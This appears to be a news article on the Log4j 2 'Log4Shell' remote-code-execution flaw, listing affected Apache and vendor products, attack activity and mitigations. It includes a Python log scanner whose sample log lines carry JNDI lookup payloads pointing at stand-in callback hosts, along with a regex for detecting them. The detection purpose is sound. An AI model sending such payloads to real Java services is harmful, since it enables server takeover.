Almost 17 Apache projects are affected by the Log4j 2 vulnerability


In recent days the web has been full of discussion about the Log4j vulnerability, for which various kinds of attacks have been identified and several different exploits have been refined.

What makes the issue so serious is that this is a popular framework for organizing logging in Java applications, and it allows arbitrary code execution when a specially crafted value of the form "${jndi:URL}" is written to the log. The attack can be carried out against Java applications that log values obtained from external sources, for example by echoing a problematic value back in error messages.

In practice, the attacker sends HTTP requests to the target system, which produces a log entry through Log4j 2; Log4j 2 in turn uses JNDI to make a request to a location controlled by the attacker. The vulnerability then causes the exploited system to reach that location and execute the payload. In many of the observed attacks, the attacker-controlled endpoint was a DNS logging service, intended to record requests from the site so that vulnerable systems can be identified.
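As an added illustration (not code from the original article), the following Python snippet scans constructed web-server log lines for the `${jndi:...}` lookup form described above, URL-decoding each line first, and separates DNS callbacks, which only fingerprint exposed hosts, from lookups that would make the JVM fetch a remote object. The host names and log lines are constructed samples.

```python
import re
from typing import NamedTuple, Optional
from urllib.parse import unquote

# Matches the Log4j 2 lookup syntax described above, e.g. "${jndi:ldap://host:1389/x}".
# Only the plain form from the article is handled; scheme, host and port are captured
# so a responder can see where the victim JVM would have connected.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-zA-Z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?"
)


class Finding(NamedTuple):
    line_no: int
    scheme: str
    host: str
    port: Optional[int]
    reconnaissance_only: bool  # True for dns:// callbacks, which only confirm exposure


def scan_lines(lines):
    """Return one Finding per log line carrying a JNDI lookup string."""
    findings = []
    for n, raw in enumerate(lines, start=1):
        # Access logs often keep the request URL-encoded ("%24%7Bjndi..."); decode once.
        m = JNDI_LOOKUP.search(unquote(raw))
        if not m:
            continue
        scheme = m.group("scheme").lower()
        port = int(m.group("port")) if m.group("port") else None
        findings.append(Finding(n, scheme, m.group("host"), port, scheme == "dns"))
    return findings


# Constructed sample access-log lines (not real traffic): one benign request,
# one lookup planted in the User-Agent header, one DNS probe in the query string.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://callback.example:1389/a}"',
    '203.0.113.9 - - [13/Dec/2021:10:02:44 +0000] "GET /?q=${jndi:dns://probe.example/x} HTTP/1.1" '
    '404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        kind = "DNS probe (scanner fingerprinting)" if f.reconnaissance_only else "remote object fetch attempt"
        print(f"line {f.line_no}: {f.scheme}://{f.host}:{f.port} -> {kind}")
```

Hosts flagged with an ldap:// or rmi:// lookup deserve the JVM-level checks from the mitigation advice further down; DNS-only hits still tell you the host was reachable and was logging untrusted input.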

As our colleague Isaac has already explained:

This Log4j vulnerability allows exploiting incorrect input validation against LDAP, enabling remote code execution (RCE) and compromise of the server (system confidentiality, data integrity and system availability). Moreover, the problem, or the importance of this vulnerability, lies in the number of applications and servers that use it, including enterprise software and cloud services such as Apple iCloud, Steam, or popular video games such as Minecraft: Java Edition, Twitter, Cloudflare, Tencent, ElasticSearch, Redis, Elastic Logstash, and so on.

On the subject, the Apache Software Foundation recently published a post summarizing the projects affected by the critical vulnerability in Log4j 2 that allows arbitrary code to run on the server.

The following Apache projects are affected: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl, and Calcite Avatica. The vulnerability also affected GitHub products, including GitHub.com, GitHub Enterprise Cloud, and GitHub Enterprise Server.

In recent days there has been a sharp increase in activity related to exploiting the vulnerability. For example, Check Point logged about 100 exploitation attempts per minute against its virtual servers at the peak, and Sophos announced the discovery of a new cryptocurrency-mining botnet built from systems carrying the unpatched Log4j 2 vulnerability.

According to the information published about the problem:

  • The vulnerability has been confirmed in many Docker images, including the couchbase, elasticsearch, flink, solr and storm images, among others.
  • The vulnerability is present in the MongoDB Atlas Search product.
  • The problem shows up in various Cisco products, including Cisco Webex Meetings Server, Cisco CX Cloud Agent, Cisco Advanced Web Security Reporting, Cisco Firepower Threat Defense (FTD), Cisco Identity Services Engine (ISE), Cisco CloudCenter, Cisco DNA Center, Cisco BroadWorks, and others.
  • The problem is present in IBM WebSphere Application Server and in the following Red Hat products: OpenShift, OpenShift Logging, OpenStack Platform, Integration Camel, CodeReady Studio, Data Grid, Fuse, and AMQ Streams.
  • The issue is confirmed in Junos Space Network Management Platform, Northstar Controller / Planner, and Paragon Insights / Pathfinder / Planner.
  • Many products from Oracle, vmWare, Broadcom, and Amazon are also affected.

Apache projects not affected by the Log4j 2 vulnerability: Apache Iceberg, Guacamole, Hadoop, Log4Net, Spark, Tomcat, ZooKeeper, and CloudStack.

Users of the affected packages are advised to install the updates released for them as a matter of urgency, to update the Log4j 2 version separately, or to set the log4j2.formatMsgNoLookups parameter to true (for example, by adding the "-Dlog4j2.formatMsgNoLookups=true" option at startup).

To lock down vulnerable systems to which there is no direct access, it is suggested to use the Logout4Shell vaccine, which, by carrying out the attack itself, sets the Java settings "log4j2.formatMsgNoLookups=true", "com.sun.jndi.rmi.object.trustURLCodebase=false" and "com.sun.jndi.cosnaming.object.trustURLCodebase=false" in order to block further exposure of the vulnerability on unmaintained systems.
